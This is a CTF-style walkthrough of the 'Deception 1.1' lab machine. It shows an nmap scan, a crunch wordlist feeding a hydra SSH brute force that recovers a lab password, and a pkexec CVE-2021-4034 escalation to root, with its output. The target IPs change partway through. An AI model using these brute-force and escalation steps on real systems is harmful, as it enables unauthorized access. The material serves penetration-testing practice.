Deception 1.1

Description➡️

Now with this I unziped this Deception File and Now let’s dig into it ⤵️

Let’s find out about the victim machines IP address ⤵️

IP : 10.0.2.41

Port Scan Results ⤵️

┌──(kali㉿kali)-[~/Downloads/Proving_Ground/Deception1.1]
└─$ sudo nmap -sC -sV -p- -T4 -oN Nmap_results.txt 10.0.2.41
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-29 21:59 IST
Nmap scan report for 10.0.2.41
Host is up (0.0018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 75b393d4f10230bf35ea124e3be7fa4a (RSA)
|   256 f98c435b457dfe84b1f593a368bbce84 (ECDSA)
|_  256 772a333e8f2b65a5f3dfb5bc584af48e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site dose not have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:73:99:30 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web Enumeration ⤵️

Now let’s Enter the password check with some difficulty like for example ABD@3291#nano .

In return I got the alert like this ⬇️

with this message ⬇️

Now I guess that file “0000flagflagflagflag.php” , where flag=1 so the file becomes ➡️ “00001111.php”

Lets try it out now ⤵️

Source code ⬇️

I need to find this password.txt file that alerted me on this page , so while enumerating I got the password.txt file in this location ⤵️

Now lets create a password.txt file with password ya5h[a-z,a-z] >

┌──(kali㉿kali)-[~/Downloads/Vulnhub/Deception1.1]
└─$ crunch 6 6 -t ya5h@@ -o password.txt              
Crunch will now generate the following amount of data: 4732 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 676 

crunch: 100% completed generating output

Now lets brute force the password for user yash through hydra Tool →

┌──(kali㉿kali)-[~/Downloads/Vulnhub/Deception1.1]
└─$ hydra -l yash -P password.txt ssh://10.0.2.85 -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-03 11:15:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 676 login tries (l:1/p:676), ~11 tries per task
[DATA] attacking ssh://10.0.2.85:22/
[22][ssh] host: 10.0.2.85   login: yash   password: ya5hay
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 22 final worker threads did not complete until end.
[ERROR] 22 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-03 11:15:29

I have the credentials for yash user lets login →

{: .nolineno}
yash : ya5hay

SSH Shell ⤵️

┌──(kali㉿kali)-[~/Downloads/Vulnhub/Deception1.1]
└─$ ssh yash@10.0.2.85     
The authenticity of host '10.0.2.85 (10.0.2.85)' can not be established.
ED25519 key fingerprint is SHA256:5fFIrbx9dprTzc1L8D0uqW8A+OlWNpClw43cf4Klki4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.2.85' (ED25519) to the list of known hosts.
yash@10.0.2.85 ispassword: 
Linux haclabs 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar 19 17:15:53 2020
yash@haclabs:~$ whoami
yash
yash@haclabs:~$ id
uid=1000(yash) gid=1000(yash) groups=1000(yash),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)
yash@haclabs:~$

Now I found pkexec in the SUIDs file so I checked its version , the availability of gcc and python3 too . so that if the version is 0.105 means it is vulnerable and I have exploit for that , That exploit can lead me to root access →

yash@haclabs:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/su
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/mount
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
yash@haclabs:~$ which python3
/usr/bin/python3
yash@haclabs:~$ which gcc
/usr/bin/gcc
yash@haclabs:~$ pkexec --version
pkexec version 0.105
yash@haclabs:~$ cd /tmp
yash@haclabs:/tmp$

That means I can try this exploit CVE-2021-4034 →

I transfered the files through wget commands and its time to try this exploit →

yash@haclabs:/tmp$ 
yash@haclabs:/tmp$ ls
expl.sh
fake_module.c
helper.c
systemd-private-226a75322e014b62851f0e74e443ad31-apache2.service-ze9pxy
systemd-private-226a75322e014b62851f0e74e443ad31-systemd-timesyncd.service-jYzPAj
yash@haclabs:/tmp$ ./expl.sh 
Pwned!
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner),1000(yash)
# cd /root
# ls -al
total 36
drwx------  3 root root 4096 Mar 19  2020 .
drwxr-xr-x 18 root root 4096 Mar  9  2020 ..
-rw-------  1 root root  164 Mar 19  2020 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-------  1 root root   38 Mar  9  2020 .lesshst
drwxr-xr-x  3 root root 4096 Mar  8  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Mar  9  2020 .selected_editor
-rw-r--r--  1 root root 1753 Mar 10  2020 root_flag.txt
# cat root_flag.txt
                _                                                          _           _                                             _                 _          
               (_)                                                        (_)         (_)                                         _ (_)             _ (_)         
       _  _  _ (_)  _  _  _  _      _  _  _  _  _  _  _    _  _  _  _   _ (_) _  _  _  _       _  _  _     _  _  _  _            (_)(_)            (_)(_)         
     _(_)(_)(_)(_) (_)(_)(_)(_)_  _(_)(_)(_)(_)(_)(_)(_)_ (_)(_)(_)(_)_(_)(_)(_)(_)(_)(_)   _ (_)(_)(_) _ (_)(_)(_)(_)_             (_)               (_)         
    (_)        (_)(_) _  _  _ (_)(_)       (_) _  _  _ (_)(_)        (_)  (_)         (_)  (_)         (_)(_)        (_)            (_)               (_)         
    (_)        (_)(_)(_)(_)(_)(_)(_)       (_)(_)(_)(_)(_)(_)        (_)  (_)     _   (_)  (_)         (_)(_)        (_)            (_)     _  _      (_)         
    (_)_  _  _ (_)(_)_  _  _  _  (_)_  _  _(_)_  _  _  _  (_) _  _  _(_)  (_)_  _(_)_ (_) _(_) _  _  _ (_)(_)        (_)          _ (_) _  (_)(_)   _ (_) _       
      (_)(_)(_)(_)  (_)(_)(_)(_)   (_)(_)(_) (_)(_)(_)(_) (_)(_)(_)(_)      (_)(_) (_)(_)(_)  (_)(_)(_)   (_)        (_)         (_)(_)(_) (_)(_)  (_)(_)(_)      
                                                          (_)                                                                                                     
                                                          (_)                                                                                                    

----------------------------------
Visit our website : https://www.haclabs.org
Submit walkthrough at : yash@haclabs.org
#

Now I am Root !!

If you have any questions or suggestions, please leave a comment below. Thank You !